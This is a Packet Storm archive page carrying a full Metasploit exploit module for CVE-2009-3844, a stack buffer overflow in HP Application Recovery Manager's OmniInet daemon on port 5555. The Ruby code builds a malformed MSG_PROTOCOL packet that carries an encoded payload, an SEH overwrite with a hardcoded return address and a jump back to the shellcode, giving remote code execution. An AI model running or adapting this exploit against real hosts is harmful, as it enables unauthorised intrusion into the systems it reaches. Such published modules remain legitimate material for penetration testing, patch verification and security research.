what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HP Application Recovery Manager (OmniInet.exe) Buffer Overflow

HP Application Recovery Manager (OmniInet.exe) Buffer Overflow
Posted Dec 31, 2009
Authored by EgiX | Site metasploit.com

This Metasploit module exploits a stack-based buffer overflow in HP Application Recovery Manager OmniInet daemon. By sending a specially crafted MSG_PROTOCOL packet, a remote attacker may be able to execute arbitrary code.

tags | exploit, remote, overflow, arbitrary
advisories | CVE-2009-3844
SHA-256 | bb3140caff7cdc64edf4b36ae5ea23db6db25dcb500491fe2b403cad680d6697

HP Application Recovery Manager (OmniInet.exe) Buffer Overflow

Change Mirror Download
##
# $Id: hp_recovery_manager_omniinet.rb 8012 2009-12-28 21:12:11Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'HP Application Recovery Manager (OmniInet.exe) Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in HP Application Recovery
Manager OmniInet daemon. By sending a specially crafted MSG_PROTOCOL packet, a
remote attacker may be able to execute arbitrary code.
},
'Author' => 'EgiX <n0b0d13s[at]gmail.com>',
'Version' => '$Revision: 8012 $',
'References' =>
[
[ 'OSVDB', '60852'],
[ 'CVE', '2009-3844' ],
[ 'BID', '37250' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-091' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 4658,
'BadChars' => '\x00',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x004412ed } ], # OmniInet.exe pop ecx; pop ecx; ret
],
'DefaultTarget' => 0))

register_options([Opt::RPORT(5555)], self.class)

end

def exploit
connect

off = payload_space + 8
sep = "\x00\x00\x20\x00"

buff = "\x00\x00\x12\x67" # packet length
buff << "\xff\xfe\x32\x00\x36\x00\x37\x00" # MSG_PROTOCOL command
buff << sep + rand_text_alpha_upper(2)
buff << sep + rand_text_alpha_upper(2)
buff << sep + rand_text_alpha_upper(2)
buff << sep + rand_text_alpha_upper(2)
buff << sep + payload.encoded + generate_seh_record(target.ret)
# jump back to shellcode
buff << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + off.to_s).encode_string
buff << sep

print_status("Sending MSG_PROTOCOL packet")
sock.put(buff)

sleep(5)
handler
disconnect
end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close